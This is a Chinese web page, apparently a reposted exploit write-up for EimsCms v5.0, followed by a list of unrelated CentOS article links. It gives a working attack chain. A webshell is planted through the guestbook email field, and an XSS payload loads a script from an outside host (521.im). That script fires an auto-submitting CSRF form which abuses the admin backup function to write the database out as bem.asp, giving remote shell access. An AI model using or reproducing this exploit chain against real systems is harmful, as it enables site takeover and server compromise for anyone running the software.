客服中心
業務咨詢
技術支持
在線客服
EimsCms v5.0 XSS+CSRF=GetShell
添加時間:2011-1-30
添加:
admin
------GetShell-----
[1] 在Book.asp的郵箱處填寫一句話,提交
[2] 在Book.asp的郵箱處填寫XSS語句中的CSRF
[3] 等待管理員觸發XSS語句,然后一句話連接bem.asp
[要求] 默認后臺管理目錄/數據庫
[注意] 管理觸發XSS是在后臺查看留言
------ X S S -----
Book.asp
在郵箱里處寫入XSS語句即可
用XSS調用CSRF,例如把CSRF去轉成JS的則用
< SRC=http://521.im/xss.js></>
----- CSRF -----
<form method="post" action="http://127.0.0.1:99/admin/DataM.asp?eims=Data&Action=bfstart">
<input name="olddata" type="text" id="olddata" value="../Data/eimsCMS.mdb" size="45" readonly>
<input name="newdata" type="text" id="newdata" size="45" value="../bem.asp">
<input type="submit" name="Submit" value="開始備份" id="bem"/>
</form>
<>
document.getElementByIdx_x('bem').click();
</>
----- 分析 -----
未對Book.asp郵箱等處進行符號轉義
未過濾提交語句
關健詞:EimsCms v5.0
新文章:
- CentOS7下圖形配置網絡的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統后丟失windows啟動項
- CentOS單網卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網打印機IP講解
- CentOS7使用hostapd實現無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網絡重啟出錯
- 解決Centos7雙系統后丟失windows啟動項
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統有什么不同呢
- Centos 6.6默認iptable規則詳解
